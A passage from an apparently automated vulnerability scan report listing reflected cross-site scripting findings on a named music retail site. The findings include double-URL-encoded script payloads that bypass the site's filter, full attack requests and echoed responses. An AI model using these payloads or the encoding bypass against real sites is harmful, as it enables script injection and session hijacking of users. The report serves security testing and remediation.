There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nations%20by%20the%20Riverb4bc8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec3f0d5ee781&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=11qn9rm8khr2u8fgdufq57fd70; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:40 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=145059695; expires=Sun, 09-Jan-2011 02:38:40 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=499471972; expires=Sun, 09-Jan-2011 02:38:40 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38723

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Nations by the Riverb4bc8"><script>alert(1)</script>c3f0d5ee781" />
...[SNIP]...

1.215. http://www.insound.com/search/query/Native%20Fauna&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Native%20Fauna&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload e348b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efbc26b6fab2 was submitted in the REST URL parameter 3. This input was echoed as e348b</title><script>alert(1)</script>fbc26b6fab2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Native%20Faunae348b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efbc26b6fab2&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=rfq15u5sv8obpmh8j5kprnfl60; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=328463182; expires=Sun, 09-Jan-2011 02:38:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=491654982; expires=Sun, 09-Jan-2011 02:38:52 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Native Faunae348b</title><script>alert(1)</script>fbc26b6fab2</title>
...[SNIP]...

1.216. http://www.insound.com/search/query/Native%20Fauna&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Native%20Fauna&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7d58%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7780609dff2 was submitted in the REST URL parameter 3. This input was echoed as f7d58"><script>alert(1)</script>7780609dff2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Native%20Faunaf7d58%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7780609dff2&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=c2ukct1dnph6plkd2011mkf015; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:45 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=450730841; expires=Sun, 09-Jan-2011 02:38:45 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=427320983; expires=Sun, 09-Jan-2011 02:38:45 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Native Faunaf7d58"><script>alert(1)</script>7780609dff2" />
...[SNIP]...

1.217. http://www.insound.com/search/query/Native&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Native&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload def8c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e46ad35eb0a3 was submitted in the REST URL parameter 3. This input was echoed as def8c"><script>alert(1)</script>46ad35eb0a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nativedef8c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e46ad35eb0a3&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=tul00h5nau95ko1q4ouk2h0ci6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:43 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=263542766; expires=Sun, 09-Jan-2011 02:38:43 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=174046510; expires=Sun, 09-Jan-2011 02:38:43 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Nativedef8c"><script>alert(1)</script>46ad35eb0a3" />
...[SNIP]...

1.218. http://www.insound.com/search/query/Native&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Native&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload f54bb%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7667ec92db6 was submitted in the REST URL parameter 3. This input was echoed as f54bb</title><script>alert(1)</script>7667ec92db6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nativef54bb%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7667ec92db6&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=k6a9e6o5mqq80jasm20d87n5p0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:49 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=438157992; expires=Sun, 09-Jan-2011 02:38:49 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=12080647; expires=Sun, 09-Jan-2011 02:38:49 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Nativef54bb</title><script>alert(1)</script>7667ec92db6</title>
...[SNIP]...

1.219. http://www.insound.com/search/query/Natural%20Calamity&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Natural%20Calamity&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60264%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb29d7e63684 was submitted in the REST URL parameter 3. This input was echoed as 60264"><script>alert(1)</script>b29d7e63684 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Natural%20Calamity60264%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb29d7e63684&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=h87m5hhjufn0871k4k3jmc9l11; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:46 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=498213488; expires=Sun, 09-Jan-2011 02:38:46 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=26066721; expires=Sun, 09-Jan-2011 02:38:46 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Natural Calamity60264"><script>alert(1)</script>b29d7e63684" />
...[SNIP]...

1.220. http://www.insound.com/search/query/Natural%20Calamity&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Natural%20Calamity&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 60aa0%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eebeeb90ac7f was submitted in the REST URL parameter 3. This input was echoed as 60aa0</title><script>alert(1)</script>ebeeb90ac7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Natural%20Calamity60aa0%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eebeeb90ac7f&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1cq62kefudfk9qm8hqls262mv3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=565936943; expires=Sun, 09-Jan-2011 02:38:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=182793659; expires=Sun, 09-Jan-2011 02:38:52 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Natural Calamity60aa0</title><script>alert(1)</script>ebeeb90ac7f</title>
...[SNIP]...

1.221. http://www.insound.com/search/query/Neon%20Indian&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Neon%20Indian&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 8b33b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0ce97fd2321 was submitted in the REST URL parameter 3. This input was echoed as 8b33b</title><script>alert(1)</script>0ce97fd2321 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Neon%20Indian8b33b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0ce97fd2321&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=5jjvlcroma51u47mhjdcv1giu7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:59 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=321833872; expires=Sun, 09-Jan-2011 02:40:59 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=406758131; expires=Sun, 09-Jan-2011 02:40:59 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Neon Indian8b33b</title><script>alert(1)</script>0ce97fd2321</title>
...[SNIP]...

1.222. http://www.insound.com/search/query/Neon%20Indian&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Neon%20Indian&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44eac%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea9c5100ddc5 was submitted in the REST URL parameter 3. This input was echoed as 44eac"><script>alert(1)</script>a9c5100ddc5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Neon%20Indian44eac%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea9c5100ddc5&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=n49h5emv5m380rpqchh8kg2715; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:51 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=339683332; expires=Sun, 09-Jan-2011 02:40:51 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=566896223; expires=Sun, 09-Jan-2011 02:40:51 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Neon Indian44eac"><script>alert(1)</script>a9c5100ddc5" />
...[SNIP]...

1.223. http://www.insound.com/search/query/Nicki%20Minaj&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nicki%20Minaj&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload b06cb%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e040514512f7 was submitted in the REST URL parameter 3. This input was echoed as b06cb</title><script>alert(1)</script>040514512f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nicki%20Minajb06cb%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e040514512f7&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=i3oqnvbg8h4aqmc50pl7nl8n66; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:11 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=386220974; expires=Sun, 09-Jan-2011 02:40:11 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=368240184; expires=Sun, 09-Jan-2011 02:40:11 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Nicki Minajb06cb</title><script>alert(1)</script>040514512f7</title>
...[SNIP]...

1.224. http://www.insound.com/search/query/Nicki%20Minaj&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nicki%20Minaj&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2554%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1674cf7956e was submitted in the REST URL parameter 3. This input was echoed as d2554"><script>alert(1)</script>1674cf7956e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nicki%20Minajd2554%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1674cf7956e&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=67o6nrn18kn5arjv4dvgsrdut3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:05 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=129967594; expires=Sun, 09-Jan-2011 02:40:05 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=503878379; expires=Sun, 09-Jan-2011 02:40:05 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24970

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Nicki Minajd2554"><script>alert(1)</script>1674cf7956e" />
...[SNIP]...

1.225. http://www.insound.com/search/query/Nico%20Muhly&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nico%20Muhly&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload f5067%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea4f7f8a60ff was submitted in the REST URL parameter 3. This input was echoed as f5067</title><script>alert(1)</script>a4f7f8a60ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nico%20Muhlyf5067%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea4f7f8a60ff&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=iam57j24eqnljq28h5r4gklva0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:38 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=447931799; expires=Sun, 09-Jan-2011 02:40:38 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=558402027; expires=Sun, 09-Jan-2011 02:40:38 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Nico Muhlyf5067</title><script>alert(1)</script>a4f7f8a60ff</title>
...[SNIP]...

1.226. http://www.insound.com/search/query/Nico%20Muhly&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nico%20Muhly&from=47597/

Issue detail

